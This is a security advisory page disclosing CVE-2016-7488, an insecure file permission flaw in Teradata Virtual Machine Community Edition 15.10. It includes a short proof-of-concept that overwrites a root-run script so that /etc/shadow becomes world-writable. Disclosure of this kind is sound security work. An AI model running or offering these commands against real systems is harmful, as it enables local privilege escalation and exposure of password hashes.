Teradata Virtual Machine Community Edition 15.10 Insecure File Permission

2016.11.12
Risk: Low
Local: Yes
Remote: No
CWE: N/A


CVSS Base Score: 7.2/10
Impact Subscore: 10/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

Title: Teradata Virtual Machine Community Edition v15.10 has insecure file permission Author: Larry W. Cashdollar, @_larry0 Date: 2016-10-01 Download Site: http://downloads.teradata.com/download/database/teradata-virtual-machine-community-edition-for-vmware <http://downloads.teradata.com/download/database/teradata-virtual-machine-community-edition-for-vmware> Vendor: Teradata Vendor Notified: 2016-10-01 Vendor Contact: webform contact Description: A database appliance for virtual machine environments. Vulnerability: Teradata Virtual Machine Community Edition v15.10 has insecure file permissions on /etc/luminex/pkgmgr. These could allow a local user to modify its contents and execute commands as root. TVME:/ # ls -ld /etc/luminex/ drwxrwxrwx 2 root root 4096 Mar 3 2016 /etc/luminex/ TVME:/# ls -l /etc/luminex/ total 128 -rwxrwxrwx 1 root root 24576 Mar 3 2016 packages.db -rwxrwxrwx 1 root root 102357 Mar 3 2016 pkgmgr CVE: CVE-2016-7488 Exploit Code: aC/ $ echo "#/bin/bash" > /etc/luminex/pkgmgr aC/ $ echo "chmod 666 /etc/shadow" >> /etc/luminex/pkgmgr aC/ $ chmod 755 /etc/luminex/pkgmgr Advisory: http://www.vapidlabs.com/advisory.php?v=172 <http://www.vapidlabs.com/advisory.php?v=172>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top